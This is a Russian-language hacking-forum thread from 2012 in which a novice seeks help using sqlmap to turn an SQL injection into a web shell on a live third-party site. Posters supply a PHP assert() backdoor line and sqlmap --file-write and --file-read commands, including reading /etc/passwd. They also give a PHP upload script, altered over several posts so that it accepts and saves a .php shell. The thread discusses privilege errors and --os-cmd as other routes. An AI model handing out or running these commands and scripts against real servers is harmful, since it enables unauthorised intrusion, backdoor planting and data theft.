RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   sqlmap пару вопросов (https://rdot.org/forum/showthread.php?t=1969)

Shadowfolder 01.02.2012 19:18

что вставить в bablal?я просто не знаю <?assert($_REQUEST[bablal]);?> что дальше после этого?
и запрос будет такой? sqlmap -u "http://...?id=" --file-write="<?assert($_REQUEST[blabla]);?>" --file-dest='/tmp/1.txt'

faza02 01.02.2012 22:33

только /tmp/1.php
и после так — 1.php?blabla=[твой пхп код], ну а тебе заливка полноценного шелла, это через copy(), например

http://forum.antichat.ru/showthread.php?p=2028400#post2028400
прочитаю всю тему, посмотри, там пасаны на опыте все показали и объяснили.

Shadowfolder 02.02.2012 06:50

Не подходит мне это, я мало что могу ручками пока...Вот и прибегнул к sqlmap-у.Значит через Post запрос получится, да?
как его составить?чтобы залить шелл, а то у меня не выходит
или если можно будет наприер залить вот это

Цитата:

<?php
$name = 'my.exe';
if(file_exists($name))
echo "<a href=$name>$name</a>";
else{
if($_POST['upload']){
if($_FILES['file']['size']){
if(substr($_FILES['file']['name'], -3) == 'exe'){
if(move_uploaded_file($_FILES['file']['tmp_name'], getcwd().'/'.$name))
echo 'ok';
else
echo 'Upload filed: error number '.$_FILES['file']['error'];
}
}

}else{
?><form enctype="multipart/form-data" action="" method="post"><input name="file" type="file" />
<input type="submit" name="upload" value="Upload" />
</form><?php
}
}
?>
если все выйдет подравьте его для php, чтобы я смог загрузить тот шелл

faza02 03.02.2012 03:29

скрипт гринбира? я его тоже юзал когда-то.
my.exe замени на shell.php например, и строку
Цитата:

if(substr($_FILES['file']['name'], -3) == 'exe'){
на
Цитата:

if(substr($_FILES['file']['name'], -3) == 'php'){
ну а залить, я думаю проще то, что тебе сказали, и вообще, file_priv там Y?
дай ссылку в лс.

Shadowfolder 03.02.2012 18:42

Цитата:

Сообщение от faza02 (Сообщение 23484)
скрипт гринбира? я его тоже юзал когда-то.
my.exe замени на shell.php например, и строку
на

ну а залить, я думаю проще то, что тебе сказали, и вообще, file_priv там Y?
дай ссылку в лс.

они показали ведь ручным способ, а мне надо через sqlmap)если подскажите команды sqlmap поточнее как мне залить шелл, буду очень рад!
file_priv Y?всмысле читалка ли есть?да.могу прочитать файл etc/passwd команда sqlmap -u "http://...?id=" --file-read="/etc/passwd" работает.

что насчет скрипта гринбера
так правильно будет?

<?php
$name = 'shell.php';
if(file_exists($name))
echo "<a href=$name>$name</a>";
else{
if($_POST['upload']){
if($_FILES['file']['size']){
if(substr($_FILES['file']['name'], -3) == 'php'){
if(move_uploaded_file($_FILES['file']['tmp_name'], getcwd().'/'.$name))
echo 'ok';
else
echo 'Upload filed: error number '.$_FILES['file']['error'];
}
}

}else{
?><form enctype="multipart/form-data" action="" method="post"><input name="file" type="file" />
<input type="submit" name="upload" value="Upload" />
</form><?php
}
}
?>
будет заливка в папку /srv/www/htdocs/com/shell.php
когда я загружу скрипт гринбера там будет загрузчик файлов, что мне повзолит загрузить шелл и он будет доступен по адрессы сайт.ком/шелл.php?

madnet 03.02.2012 23:00

Если
/srv/www/htdocs/com/
корневая папка куда ты загружаешь скрипт гринбира и сам сайт доступен из этой директории, то да

Shadowfolder 04.02.2012 06:03

(( у меня похоже нету прав, выдаёт [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
а что насчет других команд вроде --os-cmd= ?как через них залить шелл

snake 04.02.2012 10:35

мб МК вкл?(

Shadowfolder 04.02.2012 12:53

мк? хм

snake 04.02.2012 13:04

а когда в /tmp/ заливаешь,такой ошибки нет?И файл потом читается через ридфайл?


Часовой пояс GMT +3, время: 08:30.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot